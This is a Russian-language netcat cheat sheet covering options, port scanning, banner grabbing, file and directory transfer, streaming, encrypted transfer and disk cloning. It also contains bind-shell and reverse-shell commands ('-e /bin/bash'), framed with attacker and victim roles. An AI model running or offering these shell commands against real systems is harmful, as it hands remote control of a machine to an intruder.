Netcat (nc) — универсальный сетевой инструмент
Может устанавливать TCP/UDP-соединения, сканировать порты, прослушивать соединения и передавать данные между хостами.

🔧 Синтаксис:

nc [опции] [хост] [порт]



📘 Основные опции:

-4     Использовать только IPv4
-6     Использовать только IPv6
-l     Прослушивать соединения (сервер)
-v     Подробный вывод
-n     Не выполнять DNS-резолвинг
-s     Указать исходный IP
-w     Таймаут соединения
-u     Использовать UDP вместо TCP
-k     Не закрывать соединение после получения
-z     Режим сканера портов



🔍 Сканирование портов и баннерграббинг:

nc -zvn 192.168.59.1 20-100         # Скан портов от 20 до 100
nc -zvn 192.168.59.1 80 22 443      # Скан определённых портов
nc -zvn sysxplore.com 80           # Скан сайта
nc sysxplore.com 80                # Получение баннера



🖥 Удалённая оболочка (Remote Shell):

На сервере (жертва):

nc -nlvp 8888 -e /bin/bash

На клиенте (атакующий):

nc 192.168.59.3 8888



🔁 Обратная оболочка (Reverse Shell):

На атакующем хосте:

nc -nlvp 8888

На жертве:

nc 192.168.59.3 8888 -e /bin/bash



📥 Передача файлов:

Скачивание:

nc -nlvp 8888 > файл.txt           # Получатель
nc хост 8888 < файл.txt            # Отправитель

Загрузка:

nc -nlvp 8888 < файл.txt           # Отправитель
nc хост 8888 > файл.txt            # Получатель



💬 Чат:

nc -nlvp 8888                      # Один клиент
nc хост 8888                       # Второй клиент



🎥 Видеопоток:

cat видео.avi | nc -nlvp 8888      # Сервер
nc хост 8888 | mplayer -vo x11 -   # Клиент




📦 Сжатие и передача директорий:
Отправитель:

tar cfp - ./папка | nc хост 8888

Получатель:

nc -l -p 8888 | uncompress | tar xvfp -



🔐 Шифрование и передача:

Отправка:

nc -l -p 8888 | openssl enc -d -des3 -pass pass:пароль > файл

Приём:

openssl enc -des3 -pass pass:пароль -in файл | nc хост 8888



💽 Клонирование Linux-диска:

Отправитель:

dd if=/dev/sdX | nc -l -p 8888

Получатель:

nc хост 8888 | dd of=/dev/sdX